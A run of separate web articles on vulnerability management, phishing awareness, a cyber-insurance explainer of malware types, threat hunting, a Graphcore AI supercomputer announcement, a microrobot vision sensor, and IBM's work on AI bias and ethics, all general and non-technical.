- Verify: Fifth, validation of remediation is accomplished through additional scans and/or IT reporting.
- Report: Finally, IT, executives, and the C-suite all have a need to understand the current state of risk around vulnerabilities. This will help onboard senior staff to the importance of the risks posed to the organisation as well as clearly document where potential attacks can occur.
Making Vulnerability Management a Board Priority
In order to engage senior management and the board with the progress that is being made in vulnerability management, you need to find a way to communicate not only what is being done but the opportunities as well as threats that the organisation faces by doing so. Of course as previously noted, the process contributes toward raising the board’s awareness of the need for effective vulnerability management.
- There is a clear benefit in having assessed the criticality of various assets and applications but this must be communicated to everyone.
- Determine the risk status to the organisation - related to key assets. Think of what can be the ultimate risk to the organisation and why it matters - time and money are great examples.
- Report metrics to the board - and do this frequently and simply:
- Provide a clear, understandable assessment of the current status
- Highlight what needs to change
- Describe how this will be accomplished and what’s needed.
- It can be beneficial to alert the board to what can happen if vulnerability isn’t managed effectively. Again, you must present this as something which relates to the organisation in a way that they can understand; this has cost us x amount of operating hours or it means that a new I.T system to manage new threats will cost you money.
How to Stay on Top of Vulnerabilities
One of the biggest challenges that CISOs face is communicating just how hard it is to stay up to date with developments in modern cybersecurity and privacy along with ever evolving vulnerabilities.
Cybercriminals are becoming smarter and using technologies which can have some major organisations struggling to keep up pace with. The average organisation will be exposed to thousands of vulnerabilities every year. Knowing which are the ones that can cause widespread damage to your organisation is essential - and getting prepared for it is even more important.
There are two sources that security practitioners and developers commonly consult
- the Common Vulnerability Enumeration (CVE) program, run by Mitre
- the National Institute of Standards and Technology's National Vulnerability Database (NVD).
However, there are many unreported vulnerabilities not included in these databases. So it is even more important that future strategies adopt a risk mitigation strategy for unreported vulnerabilities. For example;
- Asset management -
- Knowing the software titles / versions currently on the network
Vulnerability Management Solutions
There are two principle methods for vulnerability management solutions. These are manual vs modern vulnerability management.
A modern vulnerability management solution is a consistent, systematic approach to ongoing, discovered risk within the enterprise environment. It's a data-driven approach that helps companies align their security goals with the actions they can take. A manual vulnerability management solution is however based on something called, ‘Penetration testing’, which is a manual process relying on the knowledge and experience of a penetration tester to identify vulnerabilities within an organisation's systems.
Modern vulnerability solutions simplify and automate the process of vulnerability management. Some of these deal with specific elements in the process (such as scanning only) others provide a comprehensive toolkit. Others go beyond vulnerability management to provide additional cyber security functionality.
Keep Your Vulnerability Management Up to Date
Understanding what your organisation’s vulnerabilities are is a topic that every CISO needs to know. Vulnerability management is the "cyclical practice of identifying, classifying, prioritising, remediating, and mitigating" software vulnerabilities. By understanding how to prioritise the issues and bringing your organisation’s board for greater buy-in, vulnerability management is a process that can protect the present and future success of an organisation. | <urn:uuid:7101f1a8-08e9-433b-ba06-da798df68d6f> | CC-MAIN-2022-40 | https://www.bluefort.com/news/latest-blogs/vulnerability-management-what-every-ciso-needs-to-know/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00115.warc.gz | en | 0.933956 | 1,648 | 2.5625 | 3 |
The Anti-Phishing Working Group (APWG) is an organization established in 2003 to monitor phishing threats, share data to better protect consumers and businesses, and unify the global response to cybercriminal activity. In the organization´s most recent Phishing Activity Report (July 2018), the APWG identified a 46% increase in phishing websites over the previous quarter.
During the three months phishing activity on which the report was based, the organization detected 263,538 new phishing websites – half of which had .com suffixes, and a third of which had SSL certificates to give the impression they were secure sites. Phishing threats to data were highest in the payments processing industry, with other highly-targeted industries including:
- Payments Processing 39.4%
- SaaS / Webmail 18.7%
- Financial Institutions 14.2%
- Cloud Storage / File Hosting 11.3%
- Other 16.4%
Definition of a Phishing Threat
The definition of a phishing threat is any attempt to fraudulently solicit personal information from an individual or organization, or any attempt to deliver malicious software (malware), by posing as a trustworthy organization or entity. Threats are most commonly delivered by email, as in the online banking example given below, but they can also manifest as advertisements on genuine websites that have had security vulnerabilities exploited.
A Few Types of Phishing Emails:
- Urgent or Billing Phishing: A phishing email attack that attempts to mimic a real business in order to trick victims into visiting a malware-infected site. Fictitious power bills or urgent, credit card fraud notices are common templates for a deceptive phishing email.
- Spear-Phishing: Attacks are generally more dangerous than regular phishing because spear-phishing emails are tailored to attack a specific individual, department or company.
- Whale Phishing: The main goal is to gain the credentials of top-level executives. While similar to spear-phishing, whale phishing or executive phishing is much more personalized to the target and damaging to the company.
The definition of a phishing threat given above differs slightly from the definition provided by the United States Computer Emergency Readiness Team (US-CERT). That organization´s definition of a phishing threat implies that phishing attacks online are always the result of social engineering. This is not necessarily the case, as some attacks – such as “watering hole” attacks – have become so sophisticated that social engineering is not always necessary for cybercriminals to extract sensitive data or install malware.
Phishing Threats to Your Business
Phishing Threats to Operations
Regardless of whether an employee is doing their online banking or research for a work project, if they access a fake phishing website from their work computer, and download executable malware, the organization´s entire network could be infected. Depending on the nature of the malware, data could be compromised, stolen or encrypted into a format that makes it unusable until a ransom is paid.
Phishing Threats to Data
Phishing threats to data apply whether an employee is responding to a phishing email about their bank account or to any account that requires a login and password – not just e-commerce websites, but also personal email and social media accounts. The consequences of a successful phishing attack on an organization may take years to become apparent, which is why phishing threats to data should be taken seriously and measures implemented to manage the threats.
Spear Phishing Threats
Spear phishing threats are often more successful than random phishing threats due to the victim(s) being specifically targeted by the cybercriminal. The attacker finds personal details of their victim (such as appear on social media profiles) and creates a convincing phishing email that appears realistic because of its content. The massive data breaches at Target, Anthem and Sony Pictures have all been attributed to successful spear phishing attacks.
The delivery of ransomware via email is one of the most serious of all current phishing threats. Ransomware is the easiest form of malware to monetize and there has been a noticeable increase in ransomware attacks on mobile devices (up 1,300% in 2017) and on cloud-based applications which get shared with internal and external users (44% of cloud malware types make up the most common delivery vehicles for ransomware).
See the Latest
Trends in Phishing Security
Get ahead of trending threats
with our insights and solutions
into phishing threats & attacks..
How to Prevent Phishing Threats in an Organization
With there being so many different and sophisticated types of phishing attacks online, managing phishing threats in an organization is a colossal task. Technology can help manage threats to a degree, but enough phishing emails avoid detection to make the activity of phishing still worthwhile for cybercriminals.
Simulations of Phishing Threats Makes Perfect
How can you affect lasting changes in user behavior around phishing threats? Rather than rote training, engaging users by simulating real-life phishing threats drives the point home. Just as fighter pilots train in flight simulators, users can learn by experiencing a simulated phishing threat in a controlled environment.
Mixing an occasional simulated phishing threat into users’ regular email teaches them to stay alert and spot suspicious emails. Whether they click on the simulated phish, or spot and report it to incident responders, the experience is much more likely to leave a mark compared to sitting through a lecture about security.
Users experience phishing threats in terms of how they look and act – how a malicious payload infiltrates a system, spreads across the network, disrupts operations, and steals data. Next time, they will be more attuned to a suspicious email – See Something, Say Something
Recognition is the first step in the battle against phishing threats. Conditioning users to identify phishing emails will reduce the chances they will fall for a real phishing threat. However, the chances are, if one employee is receiving phishing threats through emails, others are as well. Organizations must encourage users to report suspicious messages, including emails, texts or phone calls, to security or incident response teams.
Users who recognize potential phishing threats provide a valuable source of internal, real-time attack and threat intelligence. When they report suspicious emails, incident responders obtain information that they would not have otherwise received or received too late. This internal ‘crowdsourcing’ is especially beneficial with phishing, as it’s the most common attack method.
Overloading the Security Operations Center
A natural complication of internal reporting is to overwhelm security teams with potentially harmful emails and false positives. Being able to quickly identify which reports are more reliable than others is critical to lessening the chance of a breach from a phishing email and a factor when implementing a solution to mitigate phishing threats.
Employee-sourced reports on attacks in progress provide incident response teams and security operations analysts with the information needed to rapidly respond to potential phishing threats and mitigate the risk from those that may fall prey to them. Being able to sort, assess and respond quickly is critical to stopping a phishing breach and mitigating business disruption.
Ultimately, an end-to-end phishing threat mitigation approach is a critical foundation for any security program’s phishing threat management strategy. Instead of just being the target, the workforce becomes cybercrime sensors – sounding the alarm and keeping the organization safe by providing the information SOCs need for managing phishing threats quickly and effectively.
End-to-End Phishing Mitigation from Cofense
Cofense is a testament to this working process. Cofense has conditioned our own workforce to recognize and report phishing attempts – gathering phishing attack intelligence from our entire employee base. By analyzing these emails, Cofense has avoided compromise as well as discovering and publishing malware samples well before other leading threat intelligence providers.
Even with record investment in cybersecurity, the number of breaches attributed to phishing attacks continues to grow. It’s obvious that technology alone can’t solve the problem. That’s why Cofense solutions focus on engaging the human – your last line of defense after a phish bypasses other technology – for better prevention and response. | <urn:uuid:37d577a9-d67d-45e2-8758-4d80cd07d633> | CC-MAIN-2022-40 | https://cofense.com/knowledge-center/phishing-threats/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00115.warc.gz | en | 0.938056 | 1,699 | 3 | 3 |
Starting from a single cell and shaped by nearly 4 billion years of evolution, the human brain is perhaps nature’s greatest achievement. Our brain is an incredibly complex computing device with approximately 100 billion neurons and more than 100 trillion parameters in a biological-neural-network system that delivers a level of compute yet to be matched by any silicon computers. Today, we are revealing that Graphcore is developing an ultra-intelligence AI computer that will surpass the parametric capacity of the brain.
The computer science pioneer Jack Good* was the first person to describe a machine that would exceed the capability of our brain in his 1965 paper, Speculations Concerning the First Ultra-Intelligent Machine.
Named in honour of Jack Good, Graphcore will deliver by 2024 the world’s first ultra-intelligence AI computer that we are calling the Good™ computer.
Following on from our announcement of the Bow IPU products, we are already developing the next generation of IPU technology that will power this Good™ machine to deliver the following capabilities:
Over 10 Exa-Flops of AI floating point compute
Up to 4 Petabytes of memory with a bandwidth of over 10 Petabytes/second
Support for AI model sizes of 500 trillion parameters
3D wafer on wafer logic stack
Fully supported by our Poplar® SDK
Expected cost: ~$120 million (configuration dependent)
We will provide further updates on the Good™ computer over the coming quarters and we are keen to engage with companies and AI innovators who can help us develop the next breakthroughs in AI that this ultra-intelligence machine will make possible.
*Jack Good (born Isadore Jacob Gudak on 9 December 1916) was a true pioneer who undertook important code breaking work at Bletchley Park in the UK during the 1940s, including work on the world’s first electronic computer, Colossus.
Together with Max Newman at Manchester University he helped to build the world’s first stored-program computer, the Manchester-1. Then in 1958 he developed the concept of Fast Fourier Transforms (FFTs) which are now at the centre of all wireline and wireless communication systems.
While a Fellow at Trinity College, Oxford, in the 1960s he set out the case for complex neural networks as the way to build intelligent machines, a technology that we are starting to exploit today. He also predicted the need for ultra-parallel machines with highly parallel sparse connections.
Jack Good’s comments on reinforcement learning as the best way to train an intelligent machine are highly prescient but he also described the concept of small changes in the intelligence structure, driven by feedback from the outputs, which is effectively what we do today with back propagation in deep neural networks.
Stanley Kubrick turned to Jack Good as the advisor on the 1968 film 2001: A Space Odyssey. It was Jack Good, with his insights on intelligent machines, that helped to describe the HAL 9000 computer which was a central character in the movie. | <urn:uuid:24aa6543-b161-407f-a935-1cfa8b795f1e> | CC-MAIN-2022-40 | https://www.graphcore.ai/posts/graphcore-announces-roadmap-to-ultra-intelligence-ai-supercomputer | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00315.warc.gz | en | 0.944156 | 617 | 2.703125 | 3 |
It's easy to fool ourselves into believing that we would never be the victim of a cyber attack. We read about cyber attacks happening to large corporations. We hear about it in the breakroom at work. And while we give a sympathetic look to the employee whose credit card number was stolen, we falsely believe that such a thing would never happen to us. But it can, and it does.
Our cyber security is threatened every day. Your private information and that of your client's could be held for ransom. If you don't comply to the hacker's demands, the information will either be irretrievable, made public or erased and gone forever.
Cyber liability insurance will protect you, your clients and your business from vicious cyber attacks.
Who is the Most Vulnerable?
We're all vulnerable when it comes to a cyber attack. In fact, we have begun to learn that small businesses are just as (if not more) exposed to experiencing a cyber attack than companies like Target or American Express. The cyber security of small businesses is easier to penetrate because they are lacking in exactly that: security. Only 33 percent of small businesses in the United States have cyber liability insurance. Compare that percentage to the number of small businesses getting hacked (60 percent), and you'll wonder why more small businesses aren't investing in this coverage.
Gotta Use Protection
Inc. reports that cybercriminals go after companies with less than 100 employees. Cybercriminals believe that the smaller the company is, the easier said company is to infiltrate. This belief is in part very true: smaller companies don't generally invest in hefty cyber insurance packages because they believe they won't be targets of a security breach. As the numbers show, this isn't an accurate reflection.
According to Forbes, in 2015 the top five industries most targeted by cybercriminals were as follows:
If your small business functions in any of the above capacities, you're a target. Hackers have at their disposal a number of nasty software viruses that can infiltrate your data system and leave it in ruins. This is referred to as Malware. Malware is a term used to describe malicious software. Malicious software is a computer virus that interrupts computer systems and causes them to malfunction and shut down, it can steal sensitive information and infiltrate private servers. Malware is the cyber criminal's best friend.
The most commonly used Malware programs are:
Malware: This type of malicious software deactivates computers and computer systems.
Adware: This type of malicious software automatically downloads advertisements when a user connects to the internet.
Spyware: This type of malicious software allows the hacker to gather furtive information about another person's computer searches by transferring data from the victim's hard drive to the hacker's.
Ransomware: This type of malicious software disables a computer system until a lump sum is paid by the small business to the cybercriminal.
Phishing: While not a type of software, phishing is a common practice which attempts to defraud customers and/or clients of their financial information by posturing as an authentic company.
Trojan Horse: Named for the Greek myth, this type of malicious software is a downloadable program that promises to get rid of harmful cyber viruses. In reality, the Trojan Horse virus infects the computer and computer system with a multitude of viruses.
There are a lot of dangers out there when it comes starting a small business. Don't let cyber (in)security be one of them. Visit CyberPolicy.com today to find out more about cyber insurance. | <urn:uuid:b71b2843-b3bb-4259-92ad-955f7bd7cfd7> | CC-MAIN-2022-40 | https://www.cyberpolicy.com/cybersecurity-education/what-does-cyber-liability-insurance-protect-you-from | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335326.48/warc/CC-MAIN-20220929065206-20220929095206-00315.warc.gz | en | 0.948255 | 727 | 2.71875 | 3 |
Threat hunting is the process implemented for proactive detection of malicious activity in computer networks.
The purpose of threat hunting is to detect cyberattacks that evade traditional defenses, such as firewalls or antivirus monitoring systems. It involves a manual or computer-aided search for and analysis of indicators of compromise (IoCs).
Threat hunting should be seen as an addition to existing protection systems, rather than a replacement for them, allowing for early detection of new and sophisticated threats in the network. It is the proactive nature that distinguishes threat hunting from traditional protection methods.
How threat hunting works
System penetration can occur at any time, so threat hunting is an ongoing process. It consists of the following steps:
- Hypothesis formulation. At this stage, infosec experts suggest areas to search for threats. The source of data for such suggestions can be both internal (company information about the state of IT infrastructure, penetration test results, and the like) and external (MITRE ATT&CK matrices, cyberthreat intelligence reports, security news, and so on). For example, if a new report highlights a previously unknown piece of malware, it can be hypothesized that this malware has infiltrated the company’s infrastructure.
- Hypothesis testing. Once the hypothesis is formulated, it is tested. For example, data from endpoints is analyzed for IoCs associated with new malware.
If the hypothesis is confirmed, the company can take the necessary incident response measures. In addition, the information obtained during the threat-hunting process can be used to formulate new hypotheses and improve protection systems, for example, by updating traffic filtering rules.
Hunting Maturity Model
The Hunting Maturity Model (HMM) is a system used to assess a company’s readiness for a proactive threat search. The “maturity” level depends on what tools and methods are available to and used by the business; there are five in total:
- Initial (HMM0) — the company relies primarily on traditional security systems. At the same time, minimal information is collected from key elements of the IT infrastructure.
- Minimal (HMM1) — analysts regularly collect information from the IT infrastructure and make use of cyberintelligence data.
- Procedural (HMM2) — the company uses standard threat-hunting scenarios. At this level, infosec experts collect and analyze a large amount of data but do not develop their own threat-hunting procedures.
- Innovative (HMM3) — infosec experts collect and analyze a large amount of data, develop and implement their own threat-hunting methods, and use them on a regular basis.
- Leading (HMM4) — infosec experts not only develop threat-hunting and analysis methods, but automate them as well. This helps to reveal more threats and lets analysts focus on improving the detection system and the company’s overall protection. | <urn:uuid:cf145465-0860-4ab2-8158-38f5afa6ee34> | CC-MAIN-2022-40 | https://encyclopedia.kaspersky.com/glossary/threat-hunting/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00315.warc.gz | en | 0.907899 | 603 | 2.71875 | 3 |
Researchers at Georgia State University (GSU) have designed an ‘electric eye’ – an artificial vision device – for micro-sized robots.
Through using synthetic methods, the device mimics the biochemical processes that allow for vision in the natural world.
It improves on previous research in terms of colour recognition, a particularly challenging area due to the difficulty of downscaling colour sensing devices. Conventional colour sensors typically consume a large amount of physical space and offer less accurate colour detection.
This was achieved through a unique vertical stacking architecture that offers a novel approach to how the device is designed. Its van der Waals semi-conductor powers the sensors with precise colour recognition capabilities whilst simplifying the lens system for downscaling.
“The new functionality achieved in our image sensor architecture all depends on the rapid progress of van der Waals semiconductors during recent years,” said one of the researchers.
“Compared with conventional semiconductors, such as silicon, we can precisely control the van der Waals material band structure, thickness, and other critical parameters to sense the red, green, and blue colours.”
ACS Nano, a scientific journal on nanotechnology, published the research. The article itself focused on illustrating the fundamental principles and feasibility behind artificial vision in the new micro-sized image sensor.
Sidong Lei, assistant professor of Physics at GSU and the research lead, said: “More than 80% of information is captured by vision in research, industry, medication, and our daily life. The ultimate purpose of our research is to develop a micro-scale camera for microrobots that can enter narrow spaces that are intangible by current means, and open up new horizons in medical diagnosis, environmental study, manufacturing, archaeology, and more.”
The technology is currently patent pending with Georgia State’s Office of Technology Transfer and Commercialisation.
Want to learn more about AI and big data from industry leaders? Check out AI & Big Data Expo taking place in Amsterdam, California, and London.
Explore other upcoming enterprise technology events and webinars powered by TechForge here. | <urn:uuid:c73f19ab-5004-418a-917c-565425068b81> | CC-MAIN-2022-40 | https://www.artificialintelligence-news.com/2022/04/21/georgia-state-researchers-design-artificial-vision-device-for-microrobots/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00515.warc.gz | en | 0.907551 | 439 | 3.15625 | 3 |
Researchers at IBM’s R&D labs in Zurich have begun applying artificial intelligence (AI) and machine learning (ML) technologies to a host of new and unusual contexts as they attempt to discover what the technology is capable of.
The various projects are at different stages of fruition, but are all part of IBM’s wider strategy of developing core AI and using it to transform industries. However, as AI and ML technologies proliferate, increasing focus should be given to the ethical implications of using them, something IBM is keen to highlight.
“One of the concerns [with AI] is around bias – the fact that, especially in AI systems that are data-driven based on ML approaches, you can inject some bias,” says Francesca Rossi, global leader of AI ethics at IBM Research.
“If the training data is not inclusive enough, not diverse enough, then the AI system will not be fair in its decisions or recommendations for humans. You want to avoid that, so there is an issue around detecting and mitigating bias in training data, but also in models,” she says.
There are a variety of different kinds of biases. One is interaction bias, exemplified by Microsoft’s infamous chatbot Tay, which learned by observing how people interacted on Twitter. However, Twitter is not necessarily a good representation of real human interaction, and the bot had to be shut down within 24 hours after it began making racist statements.
Another, much more subtle kind of bias comes in the form of product recommendation, like the kind you see on Netflix or YouTube that recommends content you may be interested in based on what you have previously viewed. In these contexts the bias can be fairly innocuous, but when it comes to news or social media these AI filter bubbles become much more damaging through their creation of echo chambers.
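The feedback loop behind such filter bubbles can be sketched in a few lines. The toy recommender below is an illustration only — it is not how Netflix or YouTube actually rank content — but it shows how greedily suggesting whichever category has the most clicks collapses a feed to one topic after a single early click:

```python
# Toy filter-bubble simulation: a recommender that always suggests the
# category with the highest click count. Illustrative only.
counts = {"news": 1, "sport": 1, "music": 1}
counts["news"] += 1  # one early click on a news item

history = []
for _ in range(10):
    pick = max(counts, key=counts.get)  # greedy recommendation
    history.append(pick)
    counts[pick] += 1                   # the user watches what is shown

print(history)  # ['news', 'news', 'news', ...] -- an echo chamber
```

Real systems are far more sophisticated, but the self-reinforcing dynamic — showing more of what was clicked, which in turn generates more clicks — is the same.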
Natural language bias, however, is the hardest type of bias to eliminate in AI.
“Certain types of bias are baked into language,” says Barry O’Sullivan, president of the European Artificial Intelligence Association. “If you look at the proximity of certain noun phrases to other noun phrases, in many languages you’ll find nouns that refer to authority positions, like president or leader or director, are very close in text with gender nouns, and that’s not the case for females who tend to be associated maybe with caring roles or supporting roles.”
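This kind of proximity bias can be measured directly in word embeddings. The sketch below uses hand-made three-dimensional toy vectors — real embeddings such as word2vec or GloVe have hundreds of dimensions and are trained on large corpora — purely to show how a profession word can sit closer to one gender word than the other:

```python
import numpy as np

# Toy word vectors (illustrative only -- not a trained embedding).
vectors = {
    "he":        np.array([1.0, 0.1, 0.0]),
    "she":       np.array([0.1, 1.0, 0.0]),
    "president": np.array([0.9, 0.2, 0.3]),
    "nurse":     np.array([0.2, 0.9, 0.3]),
}

def cosine(a, b):
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

def gender_lean(word):
    """Positive => closer to 'he', negative => closer to 'she'."""
    return cosine(vectors[word], vectors["he"]) - cosine(vectors[word], vectors["she"])

print(f"president lean: {gender_lean('president'):+.2f}")  # +0.65
print(f"nurse lean:     {gender_lean('nurse'):+.2f}")      # -0.65
```

The same comparison run on real trained embeddings is the basis of published bias tests such as the Word Embedding Association Test.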
According to Rossi, the intersectionality of bias means it may not be possible to completely eliminate bias. “You don’t want to be biased on various protected variables, like race and gender and age, but then by removing maybe one thing you might introduce a little more bias on another because they intersect with one another,” she says.
O’Sullivan adds that bias is ultimately a question of consensus. “We have to think very carefully about how we want to deal with bias because there are questions that we often can’t agree on, such as whether something has a bias or not. In general, the question of ethics and ethical codes ultimately comes down to whether or not there’s a consensus as to what is acceptable, and what is not,” he says.
But where does this consensus come from?
The trolley problem
The trolley problem is a theoretical question applied to self-driving cars. What it essentially boils down to is, if a crash is unavoidable and someone is going to die as a result, how does the car make that decision?
“Does it kill the young woman, or does it kill the two professional men, or does it sacrifice the two children in favour of the person who’s got world-leading expertise in neurosurgery?” says O’Sullivan.
A study published by Nature, called the Moral Machine experiment, asked 2.3 million people across the globe what they would like the autonomous vehicle to do in this life-or-death situation. It found that people’s ethical values and preferences differed wildly by culture and geographic location.
“There is actually no consensus around what ethical principles should be because they’re very much dependent on societal norms,” says O’Sullivan. “That’s really challenging for AI researchers.”
Ultimately, a self-driving car will never be designed specifically to kill someone, so although the life-or-death choice is an edge case, statistical versions of the trolley problem are likely to occur in the real world.
IBM’s Rossi describes a scenario where you are in a self-driving car travelling in the same lane as a truck travelling in the opposite direction towards your car, while there is also a bicycle travelling parallel to you. The choices are to move closer to the bike to create some space between you and the truck, but in doing so risk hitting the cyclist, or move to the other side which would mean less space between you and the truck. “It’s a matter of increasing one risk over another,” she says.
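Rossi’s lane-positioning dilemma can be framed as a toy optimisation problem: pick the lateral offset that minimises a weighted sum of the two risks. Every number below — the weights and the quadratic risk curves — is invented for illustration; a real motion planner would use far richer models:

```python
# Invented, illustrative risk model: the car chooses a lateral offset in its
# lane (0.0 = hugging the cyclist's side, 1.0 = hugging the oncoming truck).
# Moving away from one hazard necessarily moves closer to the other.
def total_risk(offset, truck_weight=0.6, bike_weight=0.4):
    bike_risk = (1.0 - offset) ** 2   # rises as the car nears the bicycle
    truck_risk = offset ** 2          # rises as the car nears the truck
    return bike_weight * bike_risk + truck_weight * truck_risk

candidates = [i / 100 for i in range(101)]
best = min(candidates, key=total_risk)
print(f"least-risk offset: {best:.2f}")
```

With the truck weighted as the graver hazard, the minimiser settles slightly toward the bicycle — a concrete version of "increasing one risk over another" rather than choosing who dies.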
One solution to overcoming disagreements in ethical opinion is in the transparency of the technology – if we cannot agree on what is ethical, we at least need to know how the system is reaching its conclusions.
Building trust through transparency
To embed this transparency, IBM is proposing the use of factsheets for AI services, which it describes as being similar to food labels in the sense that, when you look at it, you can see the data it was trained on, who trained it, when it was trained, and so on.
The factsheet would comprise four main pillars: fairness – using data and models free of bias; robustness – making systems secure; explainability – people need to know what is going on inside the black box; and lineage – providing details of development, deployment and maintenance so the system can be audited throughout its lifecycle.
“We think every AI system, when it’s delivered, should be accompanied by something that describes all the design choices and also how we took care of bias, explainability, and so on,” says Rossi. “We think trust in the tech is achieved by being very transparent, not just about the data policy, but also very transparent on the design choices.”
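As a rough sketch of what such a factsheet might look like in practice, the structure below groups the four pillars into one record per delivered model. The field names and example values are illustrative inventions, not IBM’s actual FactSheets schema:

```python
from dataclasses import dataclass, field, asdict

@dataclass
class AIFactSheet:
    """Toy structure mirroring the four pillars described above.
    Field names are illustrative, not IBM's actual FactSheets schema."""
    model_name: str
    fairness: dict = field(default_factory=dict)        # bias checks on data/model
    robustness: dict = field(default_factory=dict)      # security hardening notes
    explainability: dict = field(default_factory=dict)  # how decisions are surfaced
    lineage: dict = field(default_factory=dict)         # development/deployment audit trail

sheet = AIFactSheet(
    model_name="loan-risk-scorer",
    fairness={"protected_variables_tested": ["gender", "age"], "disparate_impact": 0.92},
    robustness={"adversarial_testing": True},
    explainability={"method": "per-decision feature attributions"},
    lineage={"trained_on": "2018-Q4 loan book", "trained_by": "risk-ml team"},
)
print(asdict(sheet)["model_name"])
```

Like a food label, the point is that every delivered model ships with the same fixed set of disclosures, so an auditor knows exactly where to look.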
“In this setup, we believe humans still prevail,” says Noam Slonim, the principal investigator for Project Debater. “Humans rely more on rhetoric, and when we measure it they usually deliver speech better than the system. On the other hand, the system advantage is usually reflected by the fact it can pinpoint high-quality evidence to support its case.”
Due to AI’s ability to search huge amounts of data very quickly, there is potential for Project Debater to be used in assisting human decisions, as it can quickly identify facts and evidence, both in support and opposition to the arguments presented.
The more transparent and explainable the system is, the more those using it for these purposes will be able to trust the information it provides.
Building trust can also be helped if companies act responsibly with the powerful technologies in their hands. This is especially true in the context of rapid technological advancement, according to O’Sullivan. “Just because we can do something with AI, doesn’t mean we should go and do it,” he says.
“Humans ultimately need to be responsible for AI systems. An AI system should never be used as a way of a human being relinquishing or displacing his or her responsibility for taking a decision, so if an AI system is under your control, you are responsible,” adds O’Sullivan.
“Trust in the tech is not enough. You also want the final users to trust whoever produces that technology,” says Rossi. “You need to build a system of corporate responsibility.”
One way IBM is trying to do this is through collaborative initiatives with international bodies, national governments and other organisations developing AI technologies.
“You want to hear the voice of everybody, not just those who produce the AI system, but those communities that are affected by the AI,” concludes Rossi.
Some of the artificial intelligence applications being explored by IBM
One of the AI-powered technologies being explored by IBM Research is a decision support system for patients originally envisioned by digital health company Medgate.
Medgate wants to decentralise and automate the provision of healthcare in Switzerland, and operates a number of consultations and clinics that fit healthcare around the individual.
It offers teleclinics, for example, which allow patients to have a phone call or video chat with their doctor at any time of day, providing 24/7 access to medical consultations. Since 2000, the company claims to have undertaken 7.4 million of these teleconsultations.
These are accompanied by mini-clinics, which are essentially doctors’ surgeries minus the physical doctor. Instead, the doctor will be present by video, while the patient and a medical assistant have access to the broad range of diagnostic devices available at the clinics.
Both types of clinic are also connected to a partner network of more than 1,700 doctors, 50 clinicians and 200 pharmacies, to which a patient can be referred should they need further medical attention or guidance.
All of these services are integrated through the Medgate app which, although in essence a booking app for the consultations and clinics, acts as a hub through which patients can organise their healthcare needs.
However, not every patient who uses Medgate’s telefeatures necessarily needs to speak with a doctor. To detect and identify the cases that would best be served by a direct referral, Medgate is enlisting an AI-based chatbot, which essentially acts as an intelligent symptom checker.
Medgate claims this will save 15-20% of its costs in Switzerland.
“This is the pattern of the modern healthcare industry – in hospitals you have 90 doctors and five cooks; the future is 90 doctors, 20 software engineers,” says Medgate CEO Andy Fischer, who admits there are still a number of challenges with the technology.
One of these is technological acceptance by patients and physicians.
“Traditionally, healthcare is something that’s been very personal, it’s embedded in our language. [We think,] ‘When I’m sick, I have to see a doctor’, [but] it should be, ‘When I’m sick, I need to make sure my doctor has enough data to decide’,” says Fischer.
“But it’s such a historical, traditional thing that medicine is something personal.”
Beyond building trust in the technology, there are also direct technical challenges, such as teaching the artificial intelligence contextual information that it cannot get from textbooks – for example, the time of day, how close the patient is to a hospital, or how nervous a person is.
“This was, and will be, the major component of our collaboration with IBM,” says Fischer.
IBM Research has also partnered with fragrance and flavourings manufacturer Symrise to create perfume based on AI-generated digital fragrance models.
The technology builds on previous IBM research into using AI to pair flavours for recipe creation. The ML algorithms are used to sift through thousands of raw materials and pre-existing fragrance formulas, which helps it to identify patterns and novel combinations that have never been tried.
On top of this, the technology includes algorithms that can learn and predict what the human response to each fragrance would be, how much of a raw material to use and if there are any materials that can be substituted by another.
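One simple way to picture “finding combinations that have never been tried” is to treat each formula as a set of raw materials and score candidates by how dissimilar they are from everything already in the catalogue. The toy below — invented ingredient names, Jaccard similarity as the yardstick — is only a sketch of that search idea, not Symrise’s or IBM’s actual method:

```python
from itertools import combinations

# Invented toy catalogue: real perfume formulas contain dozens of materials.
existing = [
    frozenset({"bergamot", "vanilla", "musk"}),
    frozenset({"bergamot", "vanilla", "jasmine"}),
]
materials = ["bergamot", "cedar", "jasmine", "musk", "vanilla"]

def jaccard(a, b):
    return len(a & b) / len(a | b)

def novelty(candidate):
    """1.0 = unlike anything in the catalogue, 0.0 = an exact repeat."""
    return 1.0 - max(jaccard(candidate, f) for f in existing)

candidates = [frozenset(c) for c in combinations(materials, 3)]
untried = [c for c in candidates if c not in existing]
best = max(untried, key=novelty)
print(sorted(best), f"novelty={novelty(best):.2f}")
```

Scaled up to 1.7 million formulas and thousands of materials, this is where the search power of machine learning earns its keep — exhaustively checking what a human perfumer could only sample.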
Using this data, Symrise and IBM have already created a new perfume, called Philyra, which was generated by AI with the specific design objective of creating a fragrance for Brazilian millennials.
“That’s the part that’s amazing to me – that in 1.7 million formulas, finding something that hasn’t been done before is pretty hard to do,” says David Apel, a senior perfumer at Symrise who has been using the technology.
“The creative process is superfast and very innovative, and very interesting to me because I can still pursue my own methodology of how I create fragrance while she’s [the AI] doing something else in the background,” adds Apel. “She just feeds me ideas, so in that respect it’s a personal assistant that’s never sleeping.”
Developing broad AI that learns across disciplines is a core focus for IBM, which has historically been very active in this space. In 1997, for example, IBM’s Deep Blue system beat the chess world champion, and in 2011 IBM Watson defeated the top champions of US game show Jeopardy!.
Now, Project Debater, which absorbs massive amounts of data from a diverse set of information and perspectives to help it make arguments and well-informed decisions, has been used in a number of live public debates with humans.
“I think it’s fair to say that humans really do not have a chance when facing the machines at board games, but these board games, in my opinion, also represent the comfort zone of artificial intelligence,” says Noam Slonim, the principal investigator for Project Debater.
“In search problems, computers are much, much better than humans, so we can use the computational power to overcome human performance. The AI can use a tactic or logic that humans cannot understand in order to win the game. These observations are not true for debate,” says Slonim.
